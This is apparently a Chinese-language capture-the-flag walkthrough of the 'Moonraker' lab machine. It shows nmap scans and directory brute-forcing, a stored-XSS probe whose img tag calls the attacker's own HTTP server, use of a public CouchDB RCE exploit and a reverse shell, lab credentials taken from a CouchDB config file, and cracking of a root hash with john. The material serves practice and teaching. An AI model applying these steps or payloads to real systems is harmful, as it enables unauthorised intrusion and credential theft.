1、信息收集
1.1 扫描tcp开放端口
└─$ cat tcp_open_port.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:05:00 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.62.229
Nmap scan report for 192.168.62.229
Host is up (0.00089s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
4369/tcp open epmd
5984/tcp open couchdb
34015/tcp open unknown
MAC Address: 00:0C:29:DD:45:98 (VMware)# Nmap done at Sun Jul 16 15:05:53 2023 -- 1 IP address (1 host up) scanned in 53.10 seconds
1.2 扫描udp开放端口
└─$ cat udp_open_port.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:05:53 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.62.229
Warning: 192.168.62.229 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.229
Host is up (0.00081s latency).
All 65535 scanned ports on 192.168.62.229 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:DD:45:98 (VMware)# Nmap done at Sun Jul 16 15:07:08 2023 -- 1 IP address (1 host up) scanned in 74.60 seconds
1.3 扫描开放端口服务及其版本版本、nmap默认脚本扫描
└─$ cat open_port_service.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:07:08 2023 as: nmap -sT -sV -O -sC -p22,80,3000,4369,5984,34015, -oA open_port_service 192.168.62.229
Nmap scan report for 192.168.62.229
Host is up (0.00095s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 5fbfc033514f4aa74a7e1580aad72a0b (RSA)
| 256 5359871ea446bda7fd9a5ff9b7409d2f (ECDSA)
|_ 256 0d88d9faaf08ce2b1366a770ec490210 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: MOONRAKER
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=401
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ couchdb: 34015
5984/tcp open http CouchDB httpd 2.2.0 (Erlang OTP/19)
|_http-title: Site doesn't have a title (application/json).
|_http-server-header: CouchDB/2.2.0 (Erlang OTP/19)
34015/tcp open unknown
MAC Address: 00:0C:29:DD:45:98 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 16 15:09:38 2023 -- 1 IP address (1 host up) scanned in 150.21 seconds
1.4 nmap vuln脚本扫描
└─$ cat vuln_scan.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:09:38 2023 as: nmap --script=vuln -p22,80,3000,4369,5984,34015, -oA vuln_scan 192.168.62.229
Nmap scan report for 192.168.62.229
Host is up (0.00065s latency).PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
| /robots.txt: Robots file
| /accounting/: Potentially interesting folder
|_ /services/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3000/tcp open ppp
4369/tcp open epmd
5984/tcp open couchdb
34015/tcp open unknown
MAC Address: 00:0C:29:DD:45:98 (VMware)# Nmap done at Sun Jul 16 15:10:31 2023 -- 1 IP address (1 host up) scanned in 52.66 seconds
2、getshell
开放了22,80,3000,4369,5984,34015共6个端口,其中22和80端口最常见,3000,4369,5984,34015端口不太了解,因此先简单使用nc命令看是否可以进行交互,然后再看80端口,最后22端口
2.1 3000,4369,5984,34015
使用nc命令进行交互情况探测,发现全都无法进行交互 ,因此对80端口进行查看
2.2 80端口网站信息收集
①打开网站,播放一段视频后出现三个选项。因为在开放端口服务探测中发现了robots.txt文件,因此先查看/robots.txt。但里边信息仅为 Disallow:/ ,没有任何有价值的东西。
②先进行网站目录爆破
└─$ cat web_scan.txt
/services (Status: 301) [Size: 319] [--> http://192.168.62.229/services/]
/cats (Status: 301) [Size: 315] [--> http://192.168.62.229/cats/]
/accounting (Status: 301) [Size: 321] [--> http://192.168.62.229/accounting/]
/server-status (Status: 403) [Size: 302]
/x-files (Status: 301) [Size: 318] [--> http://192.168.62.229/x-files/]
/wp-admin.php
②网站三个选项依次进行查看,但点击进去后发现都为.html静态页面,查看http://192.168.62.229/services/的源码时发现有/svc-inq/sales.html链接网站,点击进去后页面提示业务请求能够快速处理
③试一下xss,
<img src="http://192.168.62.156:9999/web.jpg">test</a>
kali开启http服务。
还真有存储型xss漏洞,但xss漏洞需要结合其他漏洞才能getshell且构造麻烦,就先看是否有其他攻击向量。
④根据目录爆破出来的信息在80端口翻找一遍,没找到明显可以getshell的漏洞,先看看其他端口情况。
⑤浏览器分别访问3000端口,跳出鉴权认证窗口,简单尝试sql注入、xss,没发现有相关漏洞。我们没有凭据,因此先记下来,往后没有攻击向量可以结合收集到的信息进行爆破。
⑥4369端口无法在浏览器中打开。
⑦访问5984端口时有版本信息显示,再结合nmap的服务探测,直接searchsploit couchdb,结果显示有个RCE的exp,下载下来直接利用。
根据提示输入靶机IP,命令,然后发现利用成功!
⑧kali监听,然后输入反弹shell命令。成功getshell。
3、提权
①本以为存在登录页面因此会有数据库配置文件,但在/var/www/目录下没找到。
②想到利用couchdb服务进来的靶机,看看有无相关目录或配置文件。然后在/opt/couchdb/etc/local.ini中发现两个凭据
admin/mysecretpassword
hugo/321Blast0ff!!
③成功登陆hugo用户
④登陆时显示此用户有邮件信息。先进行sudo -l 提权信息查看,history信息查看,没有可以利用的点。因此直奔/var/mail/。
⑤cat hugo发现了个root用户的旧shadow格式的hash凭据,但也提到了新密码为旧密码+VR00M
⑥将hash串赋值到kali文件中,使用john进行碰撞,一会就得到密码旧密码为cyber,新密码为cyberVR00M,切换成功!!!
个人碎碎念
端口多了也难取舍啊,因此优先级和每个向量的攻击时间也要学会把控。